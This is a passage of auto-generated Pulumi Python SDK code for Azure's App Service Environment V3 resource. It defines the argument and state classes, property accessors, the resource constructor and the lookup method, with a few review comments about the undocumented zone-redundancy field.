        return pulumi.get(self, "internal_load_balancing_mode")

    @internal_load_balancing_mode.setter
    def internal_load_balancing_mode(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "internal_load_balancing_mode", value)

    @property
    @pulumi.getter
    def name(self) -> Optional[pulumi.Input[str]]:
        """
        The name of the App Service Environment. Changing this forces a new resource to be created.
        """
        return pulumi.get(self, "name")

    @name.setter
    def name(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "name", value)

    @property
    @pulumi.getter
    def tags(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:
        """
        A mapping of tags to assign to the resource. Changing this forces a new resource to be created.
        """
        return pulumi.get(self, "tags")

    @tags.setter
    def tags(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]):
        pulumi.set(self, "tags", value)

    # NOTE(review): zone_redundant is undocumented in the generated source;
    # presumably toggles availability-zone redundancy -- confirm against the
    # azurerm provider schema before relying on it.
    @property
    @pulumi.getter(name="zoneRedundant")
    def zone_redundant(self) -> Optional[pulumi.Input[bool]]:
        return pulumi.get(self, "zone_redundant")

    @zone_redundant.setter
    def zone_redundant(self, value: Optional[pulumi.Input[bool]]):
        pulumi.set(self, "zone_redundant", value)
@pulumi.input_type
class _EnvironmentV3State:
    # Generated (tfgen) state bag used when looking up / importing existing
    # EnvironmentV3 resources.  Unlike EnvironmentV3Args, every field is
    # optional, and it additionally exposes provider-computed outputs
    # (dns_suffix, inbound/outbound IP address lists, location, pricing_tier).
    def __init__(__self__, *,
                 allow_new_private_endpoint_connections: Optional[pulumi.Input[bool]] = None,
                 cluster_settings: Optional[pulumi.Input[Sequence[pulumi.Input['EnvironmentV3ClusterSettingArgs']]]] = None,
                 dedicated_host_count: Optional[pulumi.Input[int]] = None,
                 dns_suffix: Optional[pulumi.Input[str]] = None,
                 external_inbound_ip_addresses: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
                 inbound_network_dependencies: Optional[pulumi.Input[Sequence[pulumi.Input['EnvironmentV3InboundNetworkDependencyArgs']]]] = None,
                 internal_inbound_ip_addresses: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
                 internal_load_balancing_mode: Optional[pulumi.Input[str]] = None,
                 ip_ssl_address_count: Optional[pulumi.Input[int]] = None,
                 linux_outbound_ip_addresses: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
                 location: Optional[pulumi.Input[str]] = None,
                 name: Optional[pulumi.Input[str]] = None,
                 pricing_tier: Optional[pulumi.Input[str]] = None,
                 resource_group_name: Optional[pulumi.Input[str]] = None,
                 subnet_id: Optional[pulumi.Input[str]] = None,
                 tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
                 windows_outbound_ip_addresses: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
                 zone_redundant: Optional[pulumi.Input[bool]] = None):
        """
        Input properties used for looking up and filtering EnvironmentV3 resources.
        :param pulumi.Input[bool] allow_new_private_endpoint_connections: Should new Private Endpoint Connections be allowed. Defaults to `true`.
        :param pulumi.Input[Sequence[pulumi.Input['EnvironmentV3ClusterSettingArgs']]] cluster_settings: Zero or more `cluster_setting` blocks as defined below.
        :param pulumi.Input[int] dedicated_host_count: This ASEv3 should use dedicated Hosts. Possible vales are `2`. Changing this forces a new resource to be created.
        :param pulumi.Input[str] dns_suffix: the DNS suffix for this App Service Environment V3.
        :param pulumi.Input[Sequence[pulumi.Input[str]]] external_inbound_ip_addresses: The external outbound IP addresses of the App Service Environment V3.
        :param pulumi.Input[Sequence[pulumi.Input['EnvironmentV3InboundNetworkDependencyArgs']]] inbound_network_dependencies: An Inbound Network Dependencies block as defined below.
        :param pulumi.Input[Sequence[pulumi.Input[str]]] internal_inbound_ip_addresses: The internal outbound IP addresses of the App Service Environment V3.
        :param pulumi.Input[str] internal_load_balancing_mode: Specifies which endpoints to serve internally in the Virtual Network for the App Service Environment. Possible values are `None` (for an External VIP Type), and `"Web, Publishing"` (for an Internal VIP Type). Defaults to `None`.
        :param pulumi.Input[int] ip_ssl_address_count: The number of IP SSL addresses reserved for the App Service Environment V3.
        :param pulumi.Input[Sequence[pulumi.Input[str]]] linux_outbound_ip_addresses: Outbound addresses of Linux based Apps in this App Service Environment V3
        :param pulumi.Input[str] location: The location where the App Service Environment exists.
        :param pulumi.Input[str] name: The name of the App Service Environment. Changing this forces a new resource to be created.
        :param pulumi.Input[str] pricing_tier: Pricing tier for the front end instances.
        :param pulumi.Input[str] resource_group_name: The name of the Resource Group where the App Service Environment exists. Defaults to the Resource Group of the Subnet (specified by `subnet_id`).
        :param pulumi.Input[str] subnet_id: The ID of the Subnet which the App Service Environment should be connected to. Changing this forces a new resource to be created.
        :param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags: A mapping of tags to assign to the resource. Changing this forces a new resource to be created.
        :param pulumi.Input[Sequence[pulumi.Input[str]]] windows_outbound_ip_addresses: Outbound addresses of Windows based Apps in this App Service Environment V3.
        """
        if allow_new_private_endpoint_connections is not None:
            pulumi.set(__self__, "allow_new_private_endpoint_connections", allow_new_private_endpoint_connections)
        if cluster_settings is not None:
            pulumi.set(__self__, "cluster_settings", cluster_settings)
        if dedicated_host_count is not None:
            pulumi.set(__self__, "dedicated_host_count", dedicated_host_count)
        if dns_suffix is not None:
            pulumi.set(__self__, "dns_suffix", dns_suffix)
        if external_inbound_ip_addresses is not None:
            pulumi.set(__self__, "external_inbound_ip_addresses", external_inbound_ip_addresses)
        if inbound_network_dependencies is not None:
            pulumi.set(__self__, "inbound_network_dependencies", inbound_network_dependencies)
        if internal_inbound_ip_addresses is not None:
            pulumi.set(__self__, "internal_inbound_ip_addresses", internal_inbound_ip_addresses)
        if internal_load_balancing_mode is not None:
            pulumi.set(__self__, "internal_load_balancing_mode", internal_load_balancing_mode)
        if ip_ssl_address_count is not None:
            pulumi.set(__self__, "ip_ssl_address_count", ip_ssl_address_count)
        if linux_outbound_ip_addresses is not None:
            pulumi.set(__self__, "linux_outbound_ip_addresses", linux_outbound_ip_addresses)
        if location is not None:
            pulumi.set(__self__, "location", location)
        if name is not None:
            pulumi.set(__self__, "name", name)
        if pricing_tier is not None:
            pulumi.set(__self__, "pricing_tier", pricing_tier)
        if resource_group_name is not None:
            pulumi.set(__self__, "resource_group_name", resource_group_name)
        if subnet_id is not None:
            pulumi.set(__self__, "subnet_id", subnet_id)
        if tags is not None:
            pulumi.set(__self__, "tags", tags)
        if windows_outbound_ip_addresses is not None:
            pulumi.set(__self__, "windows_outbound_ip_addresses", windows_outbound_ip_addresses)
        if zone_redundant is not None:
            pulumi.set(__self__, "zone_redundant", zone_redundant)

    @property
    @pulumi.getter(name="allowNewPrivateEndpointConnections")
    def allow_new_private_endpoint_connections(self) -> Optional[pulumi.Input[bool]]:
        """
        Should new Private Endpoint Connections be allowed. Defaults to `true`.
        """
        return pulumi.get(self, "allow_new_private_endpoint_connections")

    @allow_new_private_endpoint_connections.setter
    def allow_new_private_endpoint_connections(self, value: Optional[pulumi.Input[bool]]):
        pulumi.set(self, "allow_new_private_endpoint_connections", value)

    @property
    @pulumi.getter(name="clusterSettings")
    def cluster_settings(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['EnvironmentV3ClusterSettingArgs']]]]:
        """
        Zero or more `cluster_setting` blocks as defined below.
        """
        return pulumi.get(self, "cluster_settings")

    @cluster_settings.setter
    def cluster_settings(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['EnvironmentV3ClusterSettingArgs']]]]):
        pulumi.set(self, "cluster_settings", value)

    @property
    @pulumi.getter(name="dedicatedHostCount")
    def dedicated_host_count(self) -> Optional[pulumi.Input[int]]:
        """
        This ASEv3 should use dedicated Hosts. Possible vales are `2`. Changing this forces a new resource to be created.
        """
        return pulumi.get(self, "dedicated_host_count")

    @dedicated_host_count.setter
    def dedicated_host_count(self, value: Optional[pulumi.Input[int]]):
        pulumi.set(self, "dedicated_host_count", value)

    @property
    @pulumi.getter(name="dnsSuffix")
    def dns_suffix(self) -> Optional[pulumi.Input[str]]:
        """
        the DNS suffix for this App Service Environment V3.
        """
        return pulumi.get(self, "dns_suffix")

    @dns_suffix.setter
    def dns_suffix(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "dns_suffix", value)

    @property
    @pulumi.getter(name="externalInboundIpAddresses")
    def external_inbound_ip_addresses(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
        """
        The external outbound IP addresses of the App Service Environment V3.
        """
        return pulumi.get(self, "external_inbound_ip_addresses")

    @external_inbound_ip_addresses.setter
    def external_inbound_ip_addresses(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
        pulumi.set(self, "external_inbound_ip_addresses", value)

    @property
    @pulumi.getter(name="inboundNetworkDependencies")
    def inbound_network_dependencies(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['EnvironmentV3InboundNetworkDependencyArgs']]]]:
        """
        An Inbound Network Dependencies block as defined below.
        """
        return pulumi.get(self, "inbound_network_dependencies")

    @inbound_network_dependencies.setter
    def inbound_network_dependencies(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['EnvironmentV3InboundNetworkDependencyArgs']]]]):
        pulumi.set(self, "inbound_network_dependencies", value)

    @property
    @pulumi.getter(name="internalInboundIpAddresses")
    def internal_inbound_ip_addresses(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
        """
        The internal outbound IP addresses of the App Service Environment V3.
        """
        return pulumi.get(self, "internal_inbound_ip_addresses")

    @internal_inbound_ip_addresses.setter
    def internal_inbound_ip_addresses(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
        pulumi.set(self, "internal_inbound_ip_addresses", value)

    @property
    @pulumi.getter(name="internalLoadBalancingMode")
    def internal_load_balancing_mode(self) -> Optional[pulumi.Input[str]]:
        """
        Specifies which endpoints to serve internally in the Virtual Network for the App Service Environment. Possible values are `None` (for an External VIP Type), and `"Web, Publishing"` (for an Internal VIP Type). Defaults to `None`.
        """
        return pulumi.get(self, "internal_load_balancing_mode")

    @internal_load_balancing_mode.setter
    def internal_load_balancing_mode(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "internal_load_balancing_mode", value)

    @property
    @pulumi.getter(name="ipSslAddressCount")
    def ip_ssl_address_count(self) -> Optional[pulumi.Input[int]]:
        """
        The number of IP SSL addresses reserved for the App Service Environment V3.
        """
        return pulumi.get(self, "ip_ssl_address_count")

    @ip_ssl_address_count.setter
    def ip_ssl_address_count(self, value: Optional[pulumi.Input[int]]):
        pulumi.set(self, "ip_ssl_address_count", value)

    @property
    @pulumi.getter(name="linuxOutboundIpAddresses")
    def linux_outbound_ip_addresses(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
        """
        Outbound addresses of Linux based Apps in this App Service Environment V3
        """
        return pulumi.get(self, "linux_outbound_ip_addresses")

    @linux_outbound_ip_addresses.setter
    def linux_outbound_ip_addresses(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
        pulumi.set(self, "linux_outbound_ip_addresses", value)

    @property
    @pulumi.getter
    def location(self) -> Optional[pulumi.Input[str]]:
        """
        The location where the App Service Environment exists.
        """
        return pulumi.get(self, "location")

    @location.setter
    def location(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "location", value)

    @property
    @pulumi.getter
    def name(self) -> Optional[pulumi.Input[str]]:
        """
        The name of the App Service Environment. Changing this forces a new resource to be created.
        """
        return pulumi.get(self, "name")

    @name.setter
    def name(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "name", value)

    @property
    @pulumi.getter(name="pricingTier")
    def pricing_tier(self) -> Optional[pulumi.Input[str]]:
        """
        Pricing tier for the front end instances.
        """
        return pulumi.get(self, "pricing_tier")

    @pricing_tier.setter
    def pricing_tier(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "pricing_tier", value)

    @property
    @pulumi.getter(name="resourceGroupName")
    def resource_group_name(self) -> Optional[pulumi.Input[str]]:
        """
        The name of the Resource Group where the App Service Environment exists. Defaults to the Resource Group of the Subnet (specified by `subnet_id`).
        """
        return pulumi.get(self, "resource_group_name")

    @resource_group_name.setter
    def resource_group_name(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "resource_group_name", value)

    @property
    @pulumi.getter(name="subnetId")
    def subnet_id(self) -> Optional[pulumi.Input[str]]:
        """
        The ID of the Subnet which the App Service Environment should be connected to. Changing this forces a new resource to be created.
        """
        return pulumi.get(self, "subnet_id")

    @subnet_id.setter
    def subnet_id(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "subnet_id", value)

    @property
    @pulumi.getter
    def tags(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:
        """
        A mapping of tags to assign to the resource. Changing this forces a new resource to be created.
        """
        return pulumi.get(self, "tags")

    @tags.setter
    def tags(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]):
        pulumi.set(self, "tags", value)

    @property
    @pulumi.getter(name="windowsOutboundIpAddresses")
    def windows_outbound_ip_addresses(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
        """
        Outbound addresses of Windows based Apps in this App Service Environment V3.
        """
        return pulumi.get(self, "windows_outbound_ip_addresses")

    @windows_outbound_ip_addresses.setter
    def windows_outbound_ip_addresses(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
        pulumi.set(self, "windows_outbound_ip_addresses", value)

    # NOTE(review): zone_redundant is undocumented in the generated source;
    # presumably toggles availability-zone redundancy -- confirm against the
    # azurerm provider schema before relying on it.
    @property
    @pulumi.getter(name="zoneRedundant")
    def zone_redundant(self) -> Optional[pulumi.Input[bool]]:
        return pulumi.get(self, "zone_redundant")

    @zone_redundant.setter
    def zone_redundant(self, value: Optional[pulumi.Input[bool]]):
        pulumi.set(self, "zone_redundant", value)
class EnvironmentV3(pulumi.CustomResource):
    # Generated Pulumi resource wrapping an Azure App Service Environment V3.
    # Construction is dispatched through the two @overload stubs below to the
    # real entry point `_internal_init`.
    @overload
    def __init__(__self__,
                 resource_name: str,
                 opts: Optional[pulumi.ResourceOptions] = None,
                 allow_new_private_endpoint_connections: Optional[pulumi.Input[bool]] = None,
                 cluster_settings: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['EnvironmentV3ClusterSettingArgs']]]]] = None,
                 dedicated_host_count: Optional[pulumi.Input[int]] = None,
                 internal_load_balancing_mode: Optional[pulumi.Input[str]] = None,
                 name: Optional[pulumi.Input[str]] = None,
                 resource_group_name: Optional[pulumi.Input[str]] = None,
                 subnet_id: Optional[pulumi.Input[str]] = None,
                 tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
                 zone_redundant: Optional[pulumi.Input[bool]] = None,
                 __props__=None):
        """
        Manages a 3rd Generation (v3) App Service Environment.

        > **NOTE:** App Service Environment V3 is currently in Preview.

        ## Import

        A 3rd Generation (v3) App Service Environment can be imported using the `resource id`, e.g.

        ```sh
        $ pulumi import azure:appservice/environmentV3:EnvironmentV3 myAppServiceEnv /subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/myResourceGroup/providers/Microsoft.Web/hostingEnvironments/myAppServiceEnv
        ```

        :param str resource_name: The name of the resource.
        :param pulumi.ResourceOptions opts: Options for the resource.
        :param pulumi.Input[bool] allow_new_private_endpoint_connections: Should new Private Endpoint Connections be allowed. Defaults to `true`.
        :param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['EnvironmentV3ClusterSettingArgs']]]] cluster_settings: Zero or more `cluster_setting` blocks as defined below.
        :param pulumi.Input[int] dedicated_host_count: This ASEv3 should use dedicated Hosts. Possible vales are `2`. Changing this forces a new resource to be created.
        :param pulumi.Input[str] internal_load_balancing_mode: Specifies which endpoints to serve internally in the Virtual Network for the App Service Environment. Possible values are `None` (for an External VIP Type), and `"Web, Publishing"` (for an Internal VIP Type). Defaults to `None`.
        :param pulumi.Input[str] name: The name of the App Service Environment. Changing this forces a new resource to be created.
        :param pulumi.Input[str] resource_group_name: The name of the Resource Group where the App Service Environment exists. Defaults to the Resource Group of the Subnet (specified by `subnet_id`).
        :param pulumi.Input[str] subnet_id: The ID of the Subnet which the App Service Environment should be connected to. Changing this forces a new resource to be created.
        :param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags: A mapping of tags to assign to the resource. Changing this forces a new resource to be created.
        """
        ...
    @overload
    def __init__(__self__,
                 resource_name: str,
                 args: EnvironmentV3Args,
                 opts: Optional[pulumi.ResourceOptions] = None):
        """
        Manages a 3rd Generation (v3) App Service Environment.

        > **NOTE:** App Service Environment V3 is currently in Preview.

        ## Import

        A 3rd Generation (v3) App Service Environment can be imported using the `resource id`, e.g.

        ```sh
        $ pulumi import azure:appservice/environmentV3:EnvironmentV3 myAppServiceEnv /subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/myResourceGroup/providers/Microsoft.Web/hostingEnvironments/myAppServiceEnv
        ```

        :param str resource_name: The name of the resource.
        :param EnvironmentV3Args args: The arguments to use to populate this resource's properties.
        :param pulumi.ResourceOptions opts: Options for the resource.
        """
        ...
    def __init__(__self__, resource_name: str, *args, **kwargs):
        # Runtime dispatcher: accept either an EnvironmentV3Args object or
        # keyword arguments, then forward everything to _internal_init.
        resource_args, opts = _utilities.get_resource_args_opts(EnvironmentV3Args, pulumi.ResourceOptions, *args, **kwargs)
        if resource_args is not None:
            __self__._internal_init(resource_name, opts, **resource_args.__dict__)
        else:
            __self__._internal_init(resource_name, *args, **kwargs)
    def _internal_init(__self__,
                       resource_name: str,
                       opts: Optional[pulumi.ResourceOptions] = None,
                       allow_new_private_endpoint_connections: Optional[pulumi.Input[bool]] = None,
                       cluster_settings: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['EnvironmentV3ClusterSettingArgs']]]]] = None,
                       dedicated_host_count: Optional[pulumi.Input[int]] = None,
                       internal_load_balancing_mode: Optional[pulumi.Input[str]] = None,
                       name: Optional[pulumi.Input[str]] = None,
                       resource_group_name: Optional[pulumi.Input[str]] = None,
                       subnet_id: Optional[pulumi.Input[str]] = None,
                       tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
                       zone_redundant: Optional[pulumi.Input[bool]] = None,
                       __props__=None):
        # Validate/normalize resource options before registering the resource.
        if opts is None:
            opts = pulumi.ResourceOptions()
        if not isinstance(opts, pulumi.ResourceOptions):
            raise TypeError('Expected resource options to be a ResourceOptions instance')
        if opts.version is None:
            opts.version = _utilities.get_version()
        if opts.id is None:
            # Creating a new resource: __props__ may only be supplied together
            # with opts.id (the "get existing resource" path).
            if __props__ is not None:
                raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
            __props__ = EnvironmentV3Args.__new__(EnvironmentV3Args)

            __props__.__dict__["allow_new_private_endpoint_connections"] = allow_new_private_endpoint_connections
            __props__.__dict__["cluster_settings"] = cluster_settings
            __props__.__dict__["dedicated_host_count"] = dedicated_host_count
            __props__.__dict__["internal_load_balancing_mode"] = internal_load_balancing_mode
            __props__.__dict__["name"] = name
            # resource_group_name and subnet_id are required unless the
            # resource is being looked up by URN.
            if resource_group_name is None and not opts.urn:
                raise TypeError("Missing required property 'resource_group_name'")
            __props__.__dict__["resource_group_name"] = resource_group_name
            if subnet_id is None and not opts.urn:
                raise TypeError("Missing required property 'subnet_id'")
            __props__.__dict__["subnet_id"] = subnet_id
            __props__.__dict__["tags"] = tags
            __props__.__dict__["zone_redundant"] = zone_redundant
            # Output-only properties start as None; the engine populates them
            # once the resource has been provisioned.
            __props__.__dict__["dns_suffix"] = None
            __props__.__dict__["external_inbound_ip_addresses"] = None
            __props__.__dict__["inbound_network_dependencies"] = None
            __props__.__dict__["internal_inbound_ip_addresses"] = None
            __props__.__dict__["ip_ssl_address_count"] = None
            __props__.__dict__["linux_outbound_ip_addresses"] = None
            __props__.__dict__["location"] = None
            __props__.__dict__["pricing_tier"] = None
            __props__.__dict__["windows_outbound_ip_addresses"] = None
        super(EnvironmentV3, __self__).__init__(
            'azure:appservice/environmentV3:EnvironmentV3',
            resource_name,
            __props__,
            opts)

    @staticmethod
    def get(resource_name: str,
            id: pulumi.Input[str],
            opts: Optional[pulumi.ResourceOptions] = None,
            allow_new_private_endpoint_connections: Optional[pulumi.Input[bool]] = None,
            cluster_settings: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['EnvironmentV3ClusterSettingArgs']]]]] = None,
            dedicated_host_count: Optional[pulumi.Input[int]] = None,
            dns_suffix: Optional[pulumi.Input[str]] = None,
            external_inbound_ip_addresses: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
            inbound_network_dependencies: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['EnvironmentV3InboundNetworkDependencyArgs']]]]] = None,
            internal_inbound_ip_addresses: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
            internal_load_balancing_mode: Optional[pulumi.Input[str]] = None,
            ip_ssl_address_count: Optional[pulumi.Input[int]] = None,
            linux_outbound_ip_addresses: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
            location: Optional[pulumi.Input[str]] = None,
            name: Optional[pulumi.Input[str]] = None,
            pricing_tier: Optional[pulumi.Input[str]] = None,
            resource_group_name: Optional[pulumi.Input[str]] = None,
            subnet_id: Optional[pulumi.Input[str]] = None,
            tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
            windows_outbound_ip_addresses: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
            zone_redundant: Optional[pulumi.Input[bool]] = None) -> 'EnvironmentV3':
        """
        Get an existing EnvironmentV3 resource's state with the given name, id, and optional extra
        properties used to qualify the lookup.

        :param str resource_name: The unique name of the resulting resource.
        :param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
        :param pulumi.ResourceOptions opts: Options for the resource.
        :param pulumi.Input[bool] allow_new_private_endpoint_connections: Should new Private Endpoint Connections be allowed. Defaults to `true`.
        :param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['EnvironmentV3ClusterSettingArgs']]]] cluster_settings: Zero or more `cluster_setting` blocks as defined below.
        :param pulumi.Input[int] dedicated_host_count: This ASEv3 should use dedicated Hosts. Possible vales are `2`. Changing this forces a new resource to be created.
        :param pulumi.Input[str] dns_suffix: the DNS suffix for this App Service Environment V3.
        :param pulumi.Input[Sequence[pulumi.Input[str]]] external_inbound_ip_addresses: The external outbound IP addresses of the App Service Environment V3.
        :param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['EnvironmentV3InboundNetworkDependencyArgs']]]] inbound_network_dependencies: An Inbound Network Dependencies block as defined below.
        :param pulumi.Input[Sequence[pulumi.Input[str]]] internal_inbound_ip_addresses: The internal outbound IP addresses of the App Service Environment V3.
        :param pulumi.Input[str] internal_load_balancing_mode: Specifies which endpoints to serve internally in the Virtual Network for the App Service Environment. Possible values are `None` (for an External VIP Type), and `"Web, Publishing"` (for an Internal VIP Type). Defaults to `None`.
        :param pulumi.Input[int] ip_ssl_address_count: The number of IP SSL addresses reserved for the App Service Environment V3.
        :param pulumi.Input[Sequence[pulumi.Input[str]]] linux_outbound_ip_addresses: Outbound addresses of Linux based Apps in this App Service Environment V3
        :param pulumi.Input[str] location: The location where the App Service Environment exists.
        :param pulumi.Input[str] name: The name of the App Service Environment. Changing this forces a new resource to be created.
        :param pulumi.Input[str] pricing_tier: Pricing tier for the front end instances.
        :param pulumi.Input[str] resource_group_name: The name of the Resource Group where the App Service Environment exists. Defaults to the Resource Group of the Subnet (specified by `subnet_id`).
        :param pulumi.Input[str] subnet_id: The ID of the Subnet which the App Service Environment should be connected to. Changing this forces a new resource to be created.
        :param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags: A mapping of tags to assign to the resource. Changing this forces a new resource to be created.
        :param pulumi.Input[Sequence[pulumi.Input[str]]] windows_outbound_ip_addresses: Outbound addresses of Windows based Apps in this App Service Environment V3.
        """
        # Merge the caller-provided options with the lookup id; the presence of
        # opts.id is what routes _internal_init down the "existing resource" path.
        opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))

        __props__ = _EnvironmentV3State.__new__(_EnvironmentV3State)

        __props__.__dict__["allow_new_private_endpoint_connections"] = allow_new_private_endpoint_connections
        __props__.__dict__["cluster_settings"] = cluster_settings
        __props__.__dict__["dedicated_host_count"] = dedicated_host_count
        __props__.__dict__["dns_suffix"] = dns_suffix
        __props__.__dict__["external_inbound_ip_addresses"] = external_inbound_ip_addresses
        __props__.__dict__["inbound_network_dependencies"] = inbound_network_dependencies
        __props__.__dict__["internal_inbound_ip_addresses"] = internal_inbound_ip_addresses
        __props__.__dict__["internal_load_balancing_mode"] = internal_load_balancing_mode
        __props__.__dict__["ip_ssl_address_count"] = ip_ssl_address_count
        __props__.__dict__["linux_outbound_ip_addresses"] = linux_outbound_ip_addresses
        __props__.__dict__["location"] = location
        __props__.__dict__["name"] = name
        __props__.__dict__["pricing_tier"] = pricing_tier
        __props__.__dict__["resource_group_name"] = resource_group_name
        __props__.__dict__["subnet_id"] = subnet_id
        __props__.__dict__["tags"] = tags
        __props__.__dict__["windows_outbound_ip_addresses"] = windows_outbound_ip_addresses
        __props__.__dict__["zone_redundant"] = zone_redundant
        return EnvironmentV3(resource_name, opts=opts, __props__=__props__)

    @property
    @pulumi.getter(name="allowNewPrivateEndpointConnections")
    def allow_new_private_endpoint_connections(self) -> pulumi.Output[Optional[bool]]:
        """
        Should new Private Endpoint Connections be allowed. Defaults to `true`.
        """
        return pulumi.get(self, "allow_new_private_endpoint_connections")

    @property
    @pulumi.getter(name="clusterSettings")
    def cluster_settings(self) -> pulumi.Output[Sequence['outputs.EnvironmentV3ClusterSetting']]:
        """
        Zero or more `cluster_setting` blocks as defined below.
        """
        return pulumi.get(self, "cluster_settings")

    @property
    @pulumi.getter(name="dedicatedHostCount")
    def dedicated_host_count(self) -> pulumi.Output[Optional[int]]:
        """
        This ASEv3 should use dedicated Hosts. Possible vales are `2`. Changing this forces a new resource to be created.
        """
        return pulumi.get(self, "dedicated_host_count")

    @property
    @pulumi.getter(name="dnsSuffix")
    def dns_suffix(self) -> pulumi.Output[str]:
        """
        the DNS suffix for this App Service Environment V3.
        """
        return pulumi.get(self, "dns_suffix")

    @property
    @pulumi.getter(name="externalInboundIpAddresses")
    def external_inbound_ip_addresses(self) -> pulumi.Output[Sequence[str]]:
        """
        The external outbound IP addresses of the App Service Environment V3.
        """
        return pulumi.get(self, "external_inbound_ip_addresses")

    @property
    @pulumi.getter(name="inboundNetworkDependencies")
    def inbound_network_dependencies(self) -> pulumi.Output[Sequence['outputs.EnvironmentV3InboundNetworkDependency']]:
        """
        An Inbound Network Dependencies block as defined below.
        """
        return pulumi.get(self, "inbound_network_dependencies")

    @property
    @pulumi.getter(name="internalInboundIpAddresses")
    def internal_inbound_ip_addresses(self) -> pulumi.Output[Sequence[str]]:
        """
        The internal outbound IP addresses of the App Service Environment V3.
        """
        return pulumi.get(self, "internal_inbound_ip_addresses")

    @property
    @pulumi.getter(name="internalLoadBalancingMode")
    def internal_load_balancing_mode(self) -> pulumi.Output[Optional[str]]:
        """
        Specifies which endpoints to serve internally in the Virtual Network for the App Service Environment. Possible values are `None` (for an External VIP Type), and `"Web, Publishing"` (for an Internal VIP Type). Defaults to `None`.
        """
        return pulumi.get(self, "internal_load_balancing_mode")

    @property
    @pulumi.getter(name="ipSslAddressCount")
    def ip_ssl_address_count(self) -> pulumi.Output[int]:
        """
        The number of IP SSL addresses reserved for the App Service Environment V3.
        """
        return pulumi.get(self, "ip_ssl_address_count")

    @property
    @pulumi.getter(name="linuxOutboundIpAddresses")
    def linux_outbound_ip_addresses(self) -> pulumi.Output[Sequence[str]]:
        """
        Outbound addresses of Linux based Apps in this App Service Environment V3
        """
        return pulumi.get(self, "linux_outbound_ip_addresses")

    @property
    @pulumi.getter
    def location(self) -> pulumi.Output[str]:
        """
        The location where the App Service Environment exists.
        """
        return pulumi.get(self, "location")

    @property
    @pulumi.getter
    def name(self) -> pulumi.Output[str]:
        """
        The name of the App Service Environment. Changing this forces a new resource to be created.
        """
        return pulumi.get(self, "name")

    @property
    @pulumi.getter(name="pricingTier")
    def pricing_tier(self) -> pulumi.Output[str]:
        """
        Pricing tier for the front end instances.
        """
        return pulumi.get(self, "pricing_tier")

    @property
    @pulumi.getter(name="resourceGroupName")
    def resource_group_name(self) -> pulumi.Output[str]:
        """
        The name of the Resource Group where the App Service Environment exists. Defaults to the Resource Group of the Subnet (specified by `subnet_id`).
        """
        return pulumi.get(self, "resource_group_name")

    @property
    @pulumi.getter(name="subnetId")
    def subnet_id(self) -> pulumi.Output[str]:
        """
        The ID of the Subnet which the App Service Environment should be connected to. Changing this forces a new resource to be created.
        """
        return pulumi.get(self, "subnet_id")

    @property
    @pulumi.getter
    def tags(self) -> pulumi.Output[Optional[Mapping[str, str]]]:
        """
        A mapping of tags to assign to the resource. Changing this forces a new resource to be created.
        """
        return pulumi.get(self, "tags")

    @property
    @pulumi.getter(name="windowsOutboundIpAddresses")
    def windows_outbound_ip_addresses(self) -> pulumi.Output[Sequence[str]]:
        """
        Outbound addresses of Windows based Apps in this App Service Environment V3.
        """
        return pulumi.get(self, "windows_outbound_ip_addresses")

    @property
    @pulumi.getter(name="zoneRedundant")
    def zone_redundant(self) -> pulumi.Output[Optional[bool]]:
        """
        Zone-redundancy setting for this App Service Environment.

        NOTE(review): the upstream provider schema supplies no description for
        this property — confirm exact semantics against the Azure provider docs.
        """
        return pulumi.get(self, "zone_redundant")
| 53.923761
| 291
| 0.696899
| 5,106
| 42,438
